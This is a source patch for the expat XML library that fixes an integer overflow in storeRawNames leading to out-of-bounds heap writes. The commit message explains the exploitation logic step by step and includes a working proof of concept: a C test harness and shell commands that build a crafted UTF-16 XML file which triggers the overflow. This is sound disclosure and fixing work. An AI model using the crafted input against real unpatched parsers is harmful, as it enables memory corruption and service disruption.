|
|
4e0c08 |
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
|
|
|
4e0c08 |
From: Samanta Navarro <ferivoz@riseup.net>
|
|
|
4e0c08 |
Date: Tue, 15 Feb 2022 11:55:46 +0000
|
|
|
4e0c08 |
Subject: [PATCH] Prevent integer overflow in storeRawNames
|
|
|
4e0c08 |
|
|
|
4e0c08 |
It is possible to use an integer overflow in storeRawNames for out of
|
|
|
4e0c08 |
boundary heap writes. Default configuration is affected. If compiled
|
|
|
4e0c08 |
with XML_UNICODE then the attack does not work. Compiling with
|
|
|
4e0c08 |
-fsanitize=address confirms the following proof of concept.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
The problem can be exploited by abusing the m_buffer expansion logic.
|
|
|
4e0c08 |
Even though the initial size of m_buffer is a power of two, eventually
|
|
|
4e0c08 |
it can end up a little bit lower, thus allowing allocations very close
|
|
|
4e0c08 |
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
|
|
|
4e0c08 |
names can be parsed which are almost INT_MAX in size.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Unfortunately (from an attacker point of view) INT_MAX/2 is also a
|
|
|
4e0c08 |
limitation in string pools. Having a tag name of INT_MAX/2 characters
|
|
|
4e0c08 |
or more is not possible.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Expat can convert between different encodings. UTF-16 documents which
|
|
|
4e0c08 |
contain only ASCII representable characters are twice as large as their
|
|
|
4e0c08 |
ASCII encoded counter-parts.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
The proof of concept works by taking these three considerations into
|
|
|
4e0c08 |
account:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
1. Move the m_buffer size slightly below a power of two by having a
|
|
|
4e0c08 |
short root node . This allows the m_buffer to grow very close
|
|
|
4e0c08 |
to INT_MAX.
|
|
|
4e0c08 |
2. The string pooling forbids tag names longer than or equal to
|
|
|
4e0c08 |
INT_MAX/2, so keep the attack tag name smaller than that.
|
|
|
4e0c08 |
3. To be able to still overflow INT_MAX even though the name is
|
|
|
4e0c08 |
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
|
|
|
4e0c08 |
which only contains ASCII characters. UTF-16 always stores two
|
|
|
4e0c08 |
bytes per character while the tag name is converted to using only
|
|
|
4e0c08 |
one. Our attack node byte count must be a bit higher than
|
|
|
4e0c08 |
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
|
|
|
4e0c08 |
in sum can overflow INT_MAX.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
|
|
|
4e0c08 |
without running into INT_MAX boundary check. The string pooling is
|
|
|
4e0c08 |
able to store INT_MAX/3 as tag name because the amount is below
|
|
|
4e0c08 |
INT_MAX/2 limitation. And creating the sum of both eventually overflows
|
|
|
4e0c08 |
in storeRawNames.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
Proof of Concept:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
1. Compile expat with -fsanitize=address.
|
|
|
4e0c08 |
|
|
|
4e0c08 |
2. Create Proof of Concept binary which iterates through input
|
|
|
4e0c08 |
file 16 MB at once for better performance and easier integer
|
|
|
4e0c08 |
calculations:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
cat > poc.c << EOF
|
|
|
4e0c08 |
#include <err.h>
|
|
|
4e0c08 |
#include <expat.h>
|
|
|
4e0c08 |
#include <stdlib.h>
|
|
|
4e0c08 |
#include <stdio.h>
|
|
|
4e0c08 |
|
|
|
4e0c08 |
#define CHUNK (16 * 1024 * 1024)
|
|
|
4e0c08 |
int main(int argc, char *argv[]) {
|
|
|
4e0c08 |
XML_Parser parser;
|
|
|
4e0c08 |
FILE *fp;
|
|
|
4e0c08 |
char *buf;
|
|
|
4e0c08 |
int i;
|
|
|
4e0c08 |
|
|
|
4e0c08 |
if (argc != 2)
|
|
|
4e0c08 |
errx(1, "usage: poc file.xml");
|
|
|
4e0c08 |
if ((parser = XML_ParserCreate(NULL)) == NULL)
|
|
|
4e0c08 |
errx(1, "failed to create expat parser");
|
|
|
4e0c08 |
if ((fp = fopen(argv[1], "r")) == NULL) {
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
err(1, "failed to open file");
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
if ((buf = malloc(CHUNK)) == NULL) {
|
|
|
4e0c08 |
fclose(fp);
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
err(1, "failed to allocate buffer");
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
i = 0;
|
|
|
4e0c08 |
while (fread(buf, CHUNK, 1, fp) == 1) {
|
|
|
4e0c08 |
printf("iteration %d: XML_Parse returns %d\n", ++i,
|
|
|
4e0c08 |
XML_Parse(parser, buf, CHUNK, XML_FALSE));
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
free(buf);
|
|
|
4e0c08 |
fclose(fp);
|
|
|
4e0c08 |
XML_ParserFree(parser);
|
|
|
4e0c08 |
return 0;
|
|
|
4e0c08 |
}
|
|
|
4e0c08 |
EOF
|
|
|
4e0c08 |
gcc -fsanitize=address -lexpat -o poc poc.c
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
|
|
|
4e0c08 |
3. Construct specially prepared UTF-16 XML file:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
|
|
|
4e0c08 |
echo -n '<' | dd conv=notrunc of=poc-utf8.xml
|
|
|
4e0c08 |
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
|
|
|
4e0c08 |
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
|
|
|
4e0c08 |
4. Run proof of concept:
|
|
|
4e0c08 |
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
./poc poc-utf16.xml
|
|
|
4e0c08 |
```
|
|
|
4e0c08 |
---
|
|
|
4e0c08 |
expat/lib/xmlparse.c | 7 ++++++-
|
|
|
4e0c08 |
1 file changed, 6 insertions(+), 1 deletion(-)
|
|
|
4e0c08 |
|
|
|
4e0c08 |
diff --git a/lib/xmlparse.c b/lib/xmlparse.c
|
|
|
4e0c08 |
index 4b43e613..f34d6ab5 100644
|
|
|
4e0c08 |
--- a/lib/xmlparse.c
|
|
|
4e0c08 |
+++ b/lib/xmlparse.c
|
|
|
4e0c08 |
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
|
|
|
4e0c08 |
while (tag) {
|
|
|
4e0c08 |
int bufSize;
|
|
|
4e0c08 |
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
|
|
|
4e0c08 |
+ size_t rawNameLen;
|
|
|
4e0c08 |
char *rawNameBuf = tag->buf + nameLen;
|
|
|
4e0c08 |
/* Stop if already stored. Since m_tagStack is a stack, we can stop
|
|
|
4e0c08 |
at the first entry that has already been copied; everything
|
|
|
4e0c08 |
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
|
|
|
4e0c08 |
/* For re-use purposes we need to ensure that the
|
|
|
4e0c08 |
size of tag->buf is a multiple of sizeof(XML_Char).
|
|
|
4e0c08 |
*/
|
|
|
4e0c08 |
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
|
|
4e0c08 |
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
|
|
|
4e0c08 |
+ /* Detect and prevent integer overflow. */
|
|
|
4e0c08 |
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
|
|
|
4e0c08 |
+ return XML_FALSE;
|
|
|
4e0c08 |
+ bufSize = nameLen + (int)rawNameLen;
|
|
|
4e0c08 |
if (bufSize > tag->bufEnd - tag->buf) {
|
|
|
4e0c08 |
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
|
|
|
4e0c08 |
if (temp == NULL)
|
|
|
4e0c08 |
|